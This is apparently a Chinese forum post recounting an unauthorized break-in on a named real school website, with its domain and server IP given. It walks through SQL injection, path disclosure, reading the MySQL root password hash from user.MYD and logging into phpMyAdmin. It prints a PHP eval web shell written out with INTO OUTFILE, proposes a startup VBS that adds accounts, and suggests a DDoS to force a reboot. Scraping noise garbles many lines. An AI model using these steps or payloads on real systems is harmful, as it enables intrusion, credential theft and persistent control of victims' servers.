友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！


. D" u! O! m6 w# M* A) o
常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

5 q  W0 U7 q1 n2 O4 ]5 I1 d/ W' p2 M那么想可以直接写入shell ，getshell有几个条件：
) i) p: N$ S% D, S

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

试着爆绝对路径：
) d* h. _8 K8 J8 v' x/ V1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
4 O( }6 N/ V! ]  y1 l3./load_file()  
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
( z. B: r1 r' Z& o5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
. `4 }. L+ J. l1 e" U) e1 @6 `: B* ]7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  
; U1 v6 Z9 K0 _7 H
" X  a3 A* A9 s* ]7 Q' A均不行...........................
; O. Q% |" X/ q$ i3 C
御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

9 W& {+ Y- t2 D3 Y0 x1 I! ^权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin
' X8 w3 J" ]& [/ d
默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

  a  @1 A6 V6 V  v' b9 B敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........

7 p# n3 x0 [% n/ t想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

/ u' K$ z$ B9 q2 ?, k0 E% `3 V自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

6 M3 L1 L: \, I" i& s9 Y# ]# t: g成功读到root密码：
' X$ ?& {6 U% o' a/ V; h
( O3 {2 U& o) X) @6 K- [17---- r(0072)
) X* y9 p, ^/ H* C6 B$ s& l18---- o(006f)
8 o* D* w7 x4 m! h0 n19---- o(006f)
20---- t(0074)
21---- *(002a)
$ |: ?) M7 |) F* J22---- 8(0038)
, b" @* O6 g6 T$ Y3 z% |/ ?. L23---- 2(0032)
# q6 O' T% w7 k5 O9 E3 n24---- E(0045)
4 l1 }+ U% Z. F8 _25---- 1(0031)
26---- C(0043)
27---- 5(0035)
28---- 8(0038)
29---- 2(0032)
% l2 j* Q: p1 S0 M6 K) \3 v30---- 8(0038)
31---- A(0041)
  {" p: D3 _- v$ Q1 v$ D' F32---- 9(0039)
( H( h& c$ u6 y- X/ {33---- B(0042)
34---- 5(0035)
$ b$ d8 H: K, r0 ~# w+ B/ }* v* f35---- 4(0034)
! u) A5 w. I" s& Y& K36---- 8(0038)
37---- 6(0036)
38---- 4(0034)
# Q: ^# I1 [3 ?6 f0 }39---- 9(0039)
& G5 ]4 r+ c9 ~/ E40---- 1(0031)
* U1 q# `/ a# o* l& W41---- 1(0031)
42---- 5(0035)
43---- 3(0033)
( V% j$ n* ]7 P) h# j/ Z44---- 5(0035)
45---- 9(0039)
5 r7 q* @2 |  [1 r46---- 8(0038)
4 _" S- d* X& @3 E47---- F(0046)
8 W( z3 l& }# L48---- F(0046)
49---- 4(0034)
2 H9 W" Q% g# c" ?6 G50---- F(0046)
; E) W) s" k3 V51---- 0(0030)
- O4 J0 n2 W) b) p, r52---- 3(0033)
5 H+ E1 N$ @1 ]4 F1 M1 J1 N5 ~53---- 2(0032)
54---- A(0041)
; t$ M7 q/ o9 f, U+ t9 v55---- 4(0034)
56---- A(0041)
57---- B(0042)
58---- *(0044)
5 B" @5 e( I, W; b$ t4 x3 G59---- *(0035)
60---- *(0041)
61---- *0032)
* S4 }$ P7 J2 R$ }$ E* V0 l8 x
2 i& t9 x1 V8 K2 W+ \3 d解密后成功登陆phpmyamin
6 e' j9 `+ ?: ?9 m                          
1 Z: L9 x! P1 f* D7 ~9 d
                             

找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

3 @& M/ s6 `! S' Q成功执行，拿下shell，菜刀连接：
- c: q. Q* c7 r: _
* _3 h% [# w' ?0 E% z服务器不支持asp,aspx,php提权无果...................
2 s" Q2 n) S" U5 m
但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
0 {) \& ]- h/ ]4 E( S

服务器上已经有个隐藏帐号了

- B3 X+ j3 `- x% ?) r" K

别名     administrators
9 h# ^+ G& u- ?9 G注释     管理员对计算机/域有不受限制的完全访问权

成员

-------------------------------------------------------------------------------
5 H1 ~: y0 D/ A5 Tadmin
$ K& C( G/ ~$ B/ ?" l2 f! @7 mAdministrator
slipper$
: h8 S: y$ x8 N1 C- d8 }$ jsqluser
命令成功完成。

8 W- w' R+ T4 j7 F7 S0 g/ _' P  i服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

# S! U% ^* l2 r/ pddos服务器重启，不然就只能坐等服务器重启了...............................
4 q. B0 a* S5 q, e9 T: d
; _8 x; ~6 l+ \5 c; ~) G      

3 g5 u2 j# K* T

angel